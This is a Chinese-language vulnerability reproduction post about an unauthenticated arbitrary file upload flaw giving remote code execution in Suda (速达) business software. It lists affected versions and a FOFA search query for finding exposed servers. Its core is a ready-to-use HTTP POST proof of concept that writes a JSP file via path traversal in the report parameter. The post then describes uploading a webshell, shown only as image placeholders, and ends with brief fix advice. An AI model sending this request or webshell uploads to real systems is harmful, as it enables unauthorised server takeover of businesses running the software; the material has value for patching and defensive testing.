当前位置: 首页 > article >正文

速达软件全系产品 RCE漏洞复现

0x01 产品简介

  速达软件是中小企业管理软件第一品牌和行业领导者,是128万家企业用户忠实的选择。14年来速达致力于进销存软件、ERP软件、财务软件、CRM软件等管理软件的研发和服务。

0x02 漏洞概述

  速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷

0x03 影响范围

速达A3.cloud BAS
速达A3.cloud STD
速达A30.cloud PRO
速达3000.online PRO
速达A4.cloud BAS
速达A4.cloud STD
速达A40.cloud PRO
速达4000.online PRO
速达A5.cloud STD
速达A50.cloud PRO
速达A70.cloud PRO
速达5000.online PRO
速达7000.online PRO

0x04 复现环境

FOFA:app="速达软件-公司产品"

36df6d46e8734ee9a783033486c7e380.png

0x05 漏洞复现 

PoC

POST /report/DesignReportSave.jsp?report=../文件名 HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: application/octet-stream
Connection: close

<% out.print("test");%>

c99db69b69634e929f94c84c3ce953c3.png

验证

7cb5cb6d446a40339910410c9892d8bf.png

上传马子

0eab6a5ec87945f5acc16567a036e024.png

RCE

9de36395721e41b0b5b2ab38c32f1609.png

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

 


http://www.kler.cn/a/151980.html

相关文章:

  • 异常 Exception 02
  • 【JAVA面向对象编程】--- 探索子类如何继承父类
  • 你好!线性查找【JAVA】
  • 初次使用vs code时go模块安装失败的解决办法
  • 二进制搭建以太坊2.0节点-2023最新详细版文档
  • 因为jsp for循环的一个空格引起的错误
  • 验证码及其实现
  • 力扣打卡 1410-HTML实体解析器
  • Flash学习
  • 基于Linux下搭建NextCloud构建自己的私有网盘
  • B/S软件开发架构
  • 构建SQL Server链接服务器:实现跨服务器数据访问及整合
  • 被删数据库+勒索
  • lv11 嵌入式开发 轮询与中断13
  • golang面试题:字符串转成byte数组,会发生内存拷贝吗?
  • C++:OJ练习(每日练习系列)
  • RK3568 android11 实现双路I2C触摸 --GT9xx
  • exceljs读取el-upload上传的excle数据并转为json输出
  • ES6数据解构
  • uniapp IOS从打包到上架流程(详细简单)